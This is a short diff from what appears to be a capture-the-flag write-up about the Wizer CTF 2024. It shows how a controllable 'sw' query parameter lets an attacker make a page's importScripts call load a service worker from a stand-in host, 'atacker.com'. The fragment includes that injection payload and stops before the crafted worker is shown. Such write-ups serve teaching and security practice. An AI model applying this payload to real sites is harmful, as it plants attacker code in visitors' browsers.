Aftab700/Writeups/CTF/ctfs/wizer_ctf_6_hour_challenge_2024.md

 importScripts(`/${getParameterByName('sw')}`);
 ```

-It will import the serviceWorker from value of sw since we can control it we can import our own serviceWorker with `sw=\\atacker.com\sw.js`
+It will import the serviceWorker from value of `sw` since we can control it we can import our own serviceWorker with `sw=\\atacker.com/sw.js`. \
-this will get file from `https://atacker.com\sw.js`
+This will get the file from `https://atacker.com/sw.js`

 now to craft our serviceWorker take a look at this